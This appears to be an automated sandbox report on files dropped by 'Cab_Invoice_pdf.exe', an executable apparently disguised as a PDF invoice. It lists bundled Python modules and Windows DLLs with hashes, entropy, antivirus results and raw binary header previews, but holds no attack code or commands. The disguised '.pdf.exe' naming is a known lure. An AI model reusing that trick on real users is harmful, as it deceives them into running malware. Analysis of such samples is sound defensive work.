                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...%..%..%....%...$..%... ..%...!..%...&..%.<.$..%.$..%..$...%.<.-..%.<.%..%.<....%.<.'..%.Rich..%.........PE..L...../`...........!.....^...f.......].......p.......................................R....@.............................P...0...d...............................H...8...T...............................@............p...............................text....\.......^.................. ..`.rdata...8...p...:...b..............@..@.data...............................@....rsrc...............................@..@.reloc..H...........................@..B........................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\_bz2.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):79536
                          Entropy (8bit):6.643809455301382
                          Encrypted:false
                          SSDEEP:1536:02MfT59id2pNXdCQXa64t3oS8bOWUwXpIuMVwqJyb:0T/5pNXdFa6llbOWUwXpIuMVwq0
                          MD5:445CE6BCEFB6EDDF0D953DBA17E0B320
                          SHA1:3D5FB5EEC6ECA27D37CAAE31F173DFD53909C74C
                          SHA-256:CF721704D96F071DE10A1E174A07BB1211864EA588CE1C4D6023F11701AAAB13
                          SHA-512:31B2247CB06C1905AE6857CC6FC23A9FC5E1C4FB7E76229D7444B417353A3EC76412DE73FF08750C09F5D1AD8644B8C07D79B3820E594AFE997DC733F610AA41
                          Malicious:false
                          Antivirus:
                          • Antivirus: Metadefender, Detection: 0%, Browse
                          • Antivirus: ReversingLabs, Detection: 0%
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4..g..g..g..xg..gx..f..gX,,g..gx..f..gx..f..gx..f..g_..f..g...f..g..g...g_..f..g_..f..g_..g..g_..f..gRich..g........................PE..L...../`...........!.........N......y........................................P......2^....@......................... ...H...h........0.......................@......x...T...............................@............................................text...Y........................... ..`.rdata..n1.......2..................@..@.data...8.... ......................@....rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\_ctypes.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):117424
                          Entropy (8bit):6.568932798472365
                          Encrypted:false
                          SSDEEP:1536:UhnXb10JQfHRFDrz2EH7EHURqBcNVValsffwv3TuLlbuRB/FfZWxOSQKkx1IuBPO:UhnLAI5xVVals3Py/FZWobKU1IuBPxEP
                          MD5:286CE553108A74197DF006D71D31918F
                          SHA1:01A9FDE2833F2FC684A442169480ECFC8F1559D0
                          SHA-256:13A45B718DF8CB4C0218F720C396973F8A501678C6CB6EF9380730C97553EE8C
                          SHA-512:3CA8AB25B4B069C702E02226623C0CEA55CDB7EC3FEEA50C81A0A2350BDCB9B5BB2C2D7768C810743024EA99568F20DF51ACC4AF28DAACDE0AF18F0F5D6B7A1F
                          Malicious:false
                          Antivirus:
                          • Antivirus: Metadefender, Detection: 0%, Browse
                          • Antivirus: ReversingLabs, Detection: 0%
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S<...]...]...]...%o..]..,...]..,...]..,...]..,...]../...]...6...]...6...]..4...]...]...]../...]../...]../...]../...]..Rich.]..................PE..L...../`...........!.........................0......................................6.....@..........................f......Dg..................................l....b..T...........................hb..@............0...............................text............................... ..`.rdata..~N...0...P..................@..@.data.... ...........f..............@....rsrc...............................@..@.reloc..l...........................@..B................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\_decimal.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):228528
                          Entropy (8bit):6.825703510403188
                          Encrypted:false
                          SSDEEP:6144:vISxoQN8s3Hs6B+ruCQxuqaxV3XMW5gVrserORH0i:vISxoS8s3HSruCQ6userOhv
                          MD5:DD8724365CDF7372892B0220BC8007C0
                          SHA1:0C43CFABCD2FD710432C7E76CF58CFEDE05F9069
                          SHA-256:FF753B671FE3A1D09B4676A0E08F85A4B19D0F5DD06B50DCA31339911730F343
                          SHA-512:42AF80495E1FA96A438ECE00D896D02BF3249BC4832CB182511384DB438A41F07A54A6F3F03FD992F32901A4D684E66EF337BA379CB0C9245A621CD04DB26B0D
                          Malicious:false
                          Antivirus:
                          • Antivirus: Metadefender, Detection: 0%, Browse
                          • Antivirus: ReversingLabs, Detection: 0%
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'.}c...c...c...j.@.m....../a....../o....../i....../g....../`...w../a...c........../l....../b.....,.b....../b...Richc...................PE..L...../`...........!................w.....................................................@......................... ...P...p........P...............`.......`..D!......T...............................@............................................text...Q........................... ..`.rdata..............................@..@.data........0....... ..............@....rsrc........P.......2..............@..@.reloc..D!...`..."...>..............@..B................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\_hashlib.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):39088
                          Entropy (8bit):6.576705962671287
                          Encrypted:false
                          SSDEEP:768:cAtCkdtp99Be3oOQi2ApPXl/mr/2IBIuYIBpLDG4y2jha:cAckdtp9/2oOQi3pfVm/2IBIuYIZyt
                          MD5:76A7E9C182FB34121881B868829786E5
                          SHA1:40392A3BAD97AA8C7C7C7ADD34A59F170E917747
                          SHA-256:D6F37E0BC993D76BFD3D8F28963E0936D893C3EA1B6A4B2ABCB06A053FF0BB94
                          SHA-512:4CE0AD1149F6A2619DFA17DDFC46AE3ECBE18A2A111A3457DF99B84B6F8768FCDB6470C3B0F93C08D43B06218C56EC19C7D21A6D4AEEB86F98A51DBCBCBBEC7D
                          Malicious:false
                          Antivirus:
                          • Antivirus: Metadefender, Detection: 0%, Browse
                          • Antivirus: ReversingLabs, Detection: 0%
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-.DUi.*.i.*.i.*.`...k.*..+.k.*../.b.*....c.*..).h.*...+.k.*.}.+.k.*..+.j.*.i.+...*...".h.*...*.h.*.....h.*...(.h.*.Richi.*.........PE..L...../`...........!.....>...>......H=.......P............................................@.........................`e..P....e..x....................|..........p....`..T...........................8a..@............P...............................text....<.......>.................. ..`.rdata... ...P..."...B..............@..@.data...P............d..............@....rsrc................h..............@..@.reloc..p............t..............@..B................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\_lzma.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):159408
                          Entropy (8bit):6.960223316470766
                          Encrypted:false
                          SSDEEP:3072:wV3Rr96Jf12nMU7gc22JNO2cUDQoxXChHALHuki4zHfBg9mNoaCmERoTpIuD1qyO:+hkFPMrxyhHALHEOpgYObdRoT0R
                          MD5:45D91843D03A51354A43D8DCECDF22E1
                          SHA1:C982DCDCEE7B2D64AEAA478D8FFE0087B64E391D
                          SHA-256:DB9ABC004E8DA4511025E47A255727CB45111195C6AEB6D50B61A037D7408D0A
                          SHA-512:34A13E0445499F7B655C40D9431710FDCCF1BFDA1C7477F23481E7C42526284736714ED38949F91098131F80B635631E3A0BA73DD3734D4E0759EE7F32968364
                          Malicious:false
                          Antivirus:
                          • Antivirus: Metadefender, Detection: 0%, Browse
                          • Antivirus: ReversingLabs, Detection: 0%
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......YEy..$.Q.$.Q.$.Q.\.Q.$.Q.U.P.$.Q.U.P.$.Q.U.P.$.Q.U.P.$.Q.V.P.$.Q.O.P.$.Q.$.Q@$.Q.V.P'$.Q.V.P.$.Q.V.Q.$.Q.V.P.$.QRich.$.Q................PE..L..../`...........!................h........................................p......?.....@..........................4..L....4..x....P...............R.......`.. ...(0..T............................0..@............................................text............................... ..`.rdata.............................@..@.data...`....@.......4..............@....rsrc........P.......8..............@..@.reloc.. ....`.......D..............@..B................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\_multiprocessing.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):26800
                          Entropy (8bit):6.4189500308991985
                          Encrypted:false
                          SSDEEP:384:p6hMLUifrlrCojAelk6WPw6DsuOZRIuABLipJXj0DG4y8V5OB8hU:7lr9WY298RIuAtin0DG4ymFhU
                          MD5:DBEC7953A3000BB513B26A26F6C1128D
                          SHA1:B4CBF27FAB8DF534BE31D021E4C49C42161D4CBF
                          SHA-256:307046C4F970F910968EDDC6CB9B65767FA3A70C05AA966DD6434021FEEEBDDC
                          SHA-512:2C4D84F5D27E2EB84C1867223C147AB7B5F3C0B72671A5FBCC5936B3449D683AEBD7D3D2F07B4F4203E5D6523F0BD3F8314773567D5FB6FD7262A3CEBC84D20F
                          Malicious:false
                          Antivirus:
                          • Antivirus: Metadefender, Detection: 0%, Browse
                          • Antivirus: ReversingLabs, Detection: 0%
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........\.t.=.'.=.'.=.'.Eu'.=.'.L.&.=.'.L.&.=.'.L.&.=.'.L.&.=.'6O.&.=.'.V.&.=.'.=.'.=.'6O.&.=.'6O.&.=.'6O.'.=.'6O.&.=.'Rich.=.'........................PE..L...../`...........!................}........0......................................>.....@.........................p:..`....:..x....`..(............L.......p.......5..T............................6..@............0..\............................text............................... ..`.rdata..`....0......."..............@..@.data...0....P.......6..............@....rsrc...(....`.......:..............@..@.reloc.......p.......F..............@..B........................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\_overlapped.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):40112
                          Entropy (8bit):6.515613246434881
                          Encrypted:false
                          SSDEEP:768:iW1TpulXdyBdthIw5o8IYkITWb7PkNIuttgHDG4y5Eh8i:EXdyBdRTTWb7PkNIuttghydi
                          MD5:4E5C64134B6C40E187B7F8627A6D8A2D
                          SHA1:F5C6AFFAB5A1D14D8B586A1893E136D87DDAAD75
                          SHA-256:5EEF3EB8F87D332128569E4810F9283FF57417F1BB67D59D1AB2F471505DC1B1
                          SHA-512:7D6783D20AEC060BB1D5C72FADC8D52EF6812EE0776851C96FA2AD21B66C9FA853F5F43B8B775C8A741BD2B35938E2FCCAC16A829E37F7C425978C59BA62B60B
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.SP..=...=...=.......=...<...=...8...=...9...=...>...=...<...=...;...=...<...=...<.v.=...5...=...=...=.......=...?...=.Rich..=.................PE..L...../`...........!.....>...B.......<.......P......................................|.....@.........................0i..X....i.......................................d..T............................d..@............P...............................text...2<.......>.................. ..`.rdata...$...P...&...B..............@..@.data...,............h..............@....rsrc................l..............@..@.reloc...............x..............@..B........................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\_queue.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):26288
                          Entropy (8bit):6.44734679501627
                          Encrypted:false
                          SSDEEP:768:XH9qUbFuF16rtrazup1IumUYllDG4yzFhj:3AUbFYktrazup1IumUYlvyH
                          MD5:963DD36AEC3EDB74C533B91C5A37498E
                          SHA1:5B553F18630F25C52A41BED0AC9C6262CCA662DA
                          SHA-256:D0E208BF308030C4BF879BA2A17FBEED48E10DD76C0DBDC9EB3D5F7A990302F6
                          SHA-512:513438B82C62BF26079BFD42CF6C562F7DF02A3190B246D9FB32B4342766C27EB77DEF8DE8D748B71C483CEC2B88DD9EDAE367ABFE8C157D135A259A8D859D48
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H..|&.|&.|&....|&...'.|&...#.|&...".|&...%.|&.<.'.|&..'.|&.|'..|&.<...|&.<.&.|&.<...|&.<.$.|&.Rich.|&.................PE..L...../`...........!.........,...............0.......................................:....@..........................<..L...,=..d....`...............J.......p..\...X8..T............................8..@............0...............................text............................... ..`.rdata..b....0......."..............@..@.data...t....P.......8..............@....rsrc........`.......:..............@..@.reloc..\....p.......F..............@..B................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\_socket.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):69808
                          Entropy (8bit):6.611317372453449
                          Encrypted:false
                          SSDEEP:1536:+NU6t0wKLlEIOiKISMD9f8+LeJzJbHjW/Z1IuBwC8lYHy/:+NPt0wKLlfkMD9f8ueJdbHi/Z1IuBwpL
                          MD5:FB09559F0C1C4DC91DFBE361828B0E39
                          SHA1:E38A5B68F38E6FFF3C276CEA2B40620B33295879
                          SHA-256:5EC25AD36306076275E094FCE70E150C632B193C916847535DF3904545F879F0
                          SHA-512:6D9BAE50E82F0B57240EFA2E637DE01C16CF1AEAAF95DD9F4B3DDF391CE163D140C06549243EF8D370D76A866190A49A1C1D8E8C0177CE8A709C574A1220E86C
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........3...]...]...]......].D.\...].D.X...].D.Y...].D.^...].c.\...]...\...]...\.J.].c.U...].c.]...].c.....].c._...].Rich..].................PE..L...../`...........!.....r..........Kq....................................... ............@......................... ...P...p...................................L.......T...............................@............................................text....p.......r.................. ..`.rdata...].......^...v..............@..@.data...@...........................@....rsrc...............................@..@.reloc..L...........................@..B................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\_ssl.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):143024
                          Entropy (8bit):6.46611957726107
                          Encrypted:false
                          SSDEEP:3072:Z8wJl2IslifCkaWuNPTTT/TpvdSRyOvm5GgDdhpIuM7GHux3P:Zpl2IsMDuTT/T/SRMGgDrqx
                          MD5:50F9B63B7632255FE69ABE0C2B4FAE04
                          SHA1:623BB9731CC5AA99EEB7C28DDF949495B0501717
                          SHA-256:0A7786AD8A9D4A24BD84B520BB7A8862DF949ABFCF10027172AAF0E3A18EDE7A
                          SHA-512:B35536AD316D7FABF7617451F9A4AC2088A473A97E8E023BB7AB55C50707ED9E7B3CAC2C72CE98A5F6D2CC56DF2A5D5A6B149110994006F76937BC22644D9273
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............n..n..n......n.V.o..n.V.k..n.V.j..n.V.m..n.q.o..n.M.o..n...o..n..o...n.q.f..n.q.n..n.q..n.q.l..n.Rich.n.........................PE..L...../`...........!.........N......h........................................P......V`....@.............................d...D................................ ...#..H...T...............................@............................................text...,........................... ..`.rdata..............................@..@.data....I.......H..................@....rsrc...............................@..@.reloc...#... ...$..................@..B................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\_win32sysloader.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):11776
                          Entropy (8bit):5.256625843110757
                          Encrypted:false
                          SSDEEP:192:U48hFSvy3GI5DBb7qqAcUkOJk4fgF6O/G9RdfzaYy/o:sq8zb7DAcUkOJF3O/8I/
                          MD5:D9026D178C4220AA2C40CA592E31F5C6
                          SHA1:1EDD3463DA5AB5B442FCFBFB4E9A70940B7A5A76
                          SHA-256:D5E2378B9028810872ADE3AD7591B716466EAE621CA5B6FFFB4822949A9ABF9A
                          SHA-512:00251232772E5BAAF314DE7E8263229094D4057763620A3C929623E3C93CD30C8FA5243015434318CA9A4DFA8F2E82F9519AB6CF55F232D97296F0B5F93D376B
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._aS...=...=...=..x....=. ^<...=.hb<...=. ^>...=. ^8...=. ^9...=..f<...=...<.8.=.^8...=.^=...=.^?...=.Rich..=.........................PE..L....^._...........!.........................0....;.......................................@.........................@5..`....5..d....`..l....................p......`1..T............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data........@......."..............@....gfids.......P.......$..............@..@.rsrc...l....`.......&..............@..@.reloc.......p.......*..............@..B........................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-console-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.080160932980843
                          Encrypted:false
                          SSDEEP:192:3jBMWIghWGZiKedXe123Ouo+Uggs/nGfe4pBjS/uBmWh0txKdmVWQ4GWDZoiyqnP:GWPhWVXYi00GftpBjSemTltcwpS
                          MD5:502263C56F931DF8440D7FD2FA7B7C00
                          SHA1:523A3D7C3F4491E67FC710575D8E23314DB2C1A2
                          SHA-256:94A5DF1227818EDBFD0D5091C6A48F86B4117C38550343F780C604EEE1CD6231
                          SHA-512:633EFAB26CDED9C3A5E144B81CBBD3B6ADF265134C37D88CFD5F49BB18C345B2FC3A08BA4BBC917B6F64013E275239026829BA08962E94115E94204A47B80221
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....."............!......................... ...............................0.......J....@.............................+............ ..................8=..............T............................................................................text...+........................... ..`.rsrc........ ......................@..@......".........;...T...T.........".........d.................".....................RSDSMB...5.G.8.'.d.....api-ms-win-core-console-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......+....edata... ..`....rsrc$01....` .......rsrc$02......................".....................(...`...............,...W...................G...o...............................D...s...............5...b...............................................api-ms-win-core-console-l1-1-0.dll.AllocConsole.kern
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-datetime-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.093995452106596
                          Encrypted:false
                          SSDEEP:192:RWIghWG4U9xluZo123Ouo+Uggs/nGfe4pBjSbMDPxVWh0txKdmVWQ4CWrDry6qnZ:RWPhWFv0i00GftpBjBHem6plUG+zIw
                          MD5:CB978304B79EF53962408C611DFB20F5
                          SHA1:ECA42F7754FB0017E86D50D507674981F80BC0B9
                          SHA-256:90FAE0E7C3644A6754833C42B0AC39B6F23859F9A7CF4B6C8624820F59B9DAD3
                          SHA-512:369798CD3F37FBAE311B6299DA67D19707D8F770CF46A8D12D5A6C1F25F85FC959AC5B5926BC68112FA9EB62B402E8B495B9E44F44F8949D7D648EA7C572CF8C
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...A..............!......................... ...............................0.......#....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....A...........<...T...T.......A...........d...............A.......................RSDS...W,X.l..o....4....api-ms-win-core-datetime-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02....................A.......P...............(...8...H...................t.......................api-ms-win-core-datetime-l1-1-0.dll.GetDateFormatA.kernel32.GetDateFormatA.GetDateFormatW.kernel32.GetDateFormatW.GetTimeFormatA.kernel32.GetTimeFormatA
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-debug-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.1028816880814265
                          Encrypted:false
                          SSDEEP:384:cWPhWM4Ri00GftpBj2YILemtclD16PaEC:l10oiBQe/L
                          MD5:88FF191FD8648099592ED28EE6C442A5
                          SHA1:6A4F818B53606A5602C609EC343974C2103BC9CC
                          SHA-256:C310CC91464C9431AB0902A561AF947FA5C973925FF70482D3DE017ED3F73B7D
                          SHA-512:942AE86550D4A4886DAC909898621DAB18512C20F3D694A8AD444220AEAD76FA88C481DF39F93C7074DBBC31C3B4DAF97099CFED86C2A0AAA4B63190A4B307FD
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......GF....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@................9...T...T...................d.......................................RSDS.j..v..C...B..h....api-ms-win-core-debug-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................P...............(...8...H...|...............q.......................api-ms-win-core-debug-l1-1-0.dll.DebugBreak.kernel32.DebugBreak.IsDebuggerPresent.kernel32.IsDebuggerPresent.OutputDebugStringA.kernel32.OutputDebugStri
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-errorhandling-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.126358371711227
                          Encrypted:false
                          SSDEEP:192:NFmxD3PWIghWGJY/luZo123Ouo+Uggs/nGfe4pBjSffcp8Wh0txKdmVWQ4yWRzOr:NFkWPhW60i00GftpBj4emHlD16Pa7v
                          MD5:6D778E83F74A4C7FE4C077DC279F6867
                          SHA1:F5D9CF848F79A57F690DA9841C209B4837C2E6C3
                          SHA-256:A97DCCA76CDB12E985DFF71040815F28508C655AB2B073512E386DD63F4DA325
                          SHA-512:02EF01583A265532D3970B7D520728AA9B68F2B7C309EE66BD2B38BAF473EF662C9D7A223ACF2DA722587429DA6E4FBC0496253BA5C41E214BEA240CE824E8A2
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...\x.............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....\x..........A...T...T.......\x..........d...............\x......................RSDS.1....U45.z.d.....api-ms-win-core-errorhandling-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............\x......n...............(...D...`...................4...f.......................'...J.....................api-ms-win-core-errorhandling-l1-1-0.dll.GetErrorMode.kernel32.GetErrorMode.GetLastError.kernel32.GetLastError.RaiseExcept
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-file-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):21816
                          Entropy (8bit):7.014255619395433
                          Encrypted:false
                          SSDEEP:384:d6PvVXHWPhWnsnhi00GftpBjaJemyDlD16PamW8:UPvVX85nhoisJeLt8
                          MD5:94AE25C7A5497CA0BE6882A00644CA64
                          SHA1:F7AC28BBC47E46485025A51EEB6C304B70CEE215
                          SHA-256:7EA06B7050F9EA2BCC12AF34374BDF1173646D4E5EBF66AD690B37F4DF5F3D4E
                          SHA-512:83E570B79111706742D0684FC16207AE87A78FA7FFEF58B40AA50A6B9A2C2F77FE023AF732EF577FB7CD2666E33FFAF0E427F41CA04075D83E0F6A52A177C2B0
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!.........................0...............................@......./....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@...............8...T...T..................d......................................RSDS.0...B..8....G....api-ms-win-core-file-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................K...K.......D...p...6...`.......................?...l...............A...................6..._...................;...e............... ...I...n...............-...d...................*...g...............*...U...................M...
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-file-l1-2-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.112057846012794
                          Encrypted:false
                          SSDEEP:192:IWIghWGJnWdsNtL/123Ouo+Uggs/nGfe4pBjSfcD63QXWh0txKdmVWQ4yW1rwqnh:IWPhWlsnhi00GftpBjnem9lD16PamFP
                          MD5:E2F648AE40D234A3892E1455B4DBBE05
                          SHA1:D9D750E828B629CFB7B402A3442947545D8D781B
                          SHA-256:C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
                          SHA-512:18D4E7A804813D9376427E12DAA444167129277E5FF30502A0FA29A96884BF902B43A5F0E6841EA1582981971843A4F7F928F8AECAC693904AB20CA40EE4E954
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...._.L...........!......................... ...............................0............@.............................L............ ..................8=..............T............................................................................text...<........................... ..`.rsrc........ ......................@..@....._.L........8...T...T........_.L........d................_.L....................RSDS........g"Y........api-ms-win-core-file-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg.......L....edata... ..`....rsrc$01....` .......rsrc$02........._.L....@...................(...8...l...............`.......................api-ms-win-core-file-l1-2-0.dll.CreateFile2.kernel32.CreateFile2.GetTempPathW.kernel32.GetTempPathW.GetVolumeNameForVolumeMountPointW.kernel32.GetVolumeNameForVolumeMou
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-file-l2-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.166618249693435
                          Encrypted:false
                          SSDEEP:192:BZwWIghWG4U9ydsNtL/123Ouo+Uggs/nGfe4pBjSbUGHvNWh0txKdmVWQ4CWVU9h:UWPhWFBsnhi00GftpBjKvxemPlP55QQ7
                          MD5:E479444BDD4AE4577FD32314A68F5D28
                          SHA1:77EDF9509A252E886D4DA388BF9C9294D95498EB
                          SHA-256:C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
                          SHA-512:2AFAB302FE0F7476A4254714575D77B584CD2DC5330B9B25B852CD71267CDA365D280F9AA8D544D4687DC388A2614A51C0418864C41AD389E1E847D81C3AB744
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...4..|...........!......................... ...............................0......t.....@.......................................... ..................8=..............T............................................................................text...}........................... ..`.rsrc........ ......................@..@....4..|........8...T...T.......4..|........d...............4..|....................RSDS.=.Co.P..Gd./%P....api-ms-win-core-file-l2-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........4..|........................D...p...............#...P...................;...g...................<...m...............%...Z.........................api-ms-win-core-file-l2-1-0.dll.CopyFile2.kernel32.CopyFile2.CopyFileExW.kernel32.CopyFileExW.Crea
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-handle-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.1117101479630005
                          Encrypted:false
                          SSDEEP:384:AWPhWXDz6i00GftpBj5FrFaemx+lDbNh/6:hroidkeppp
                          MD5:6DB54065B33861967B491DD1C8FD8595
                          SHA1:ED0938BBC0E2A863859AAD64606B8FC4C69B810A
                          SHA-256:945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
                          SHA-512:AA6F0BCB760D449A3A82AED67CA0F7FB747CBB82E627210F377AF74E0B43A45BA660E9E3FE1AD4CBD2B46B1127108EC4A96C5CF9DE1BDEC36E993D0657A615B6
                          Malicious:false
                          Reputation:unknown
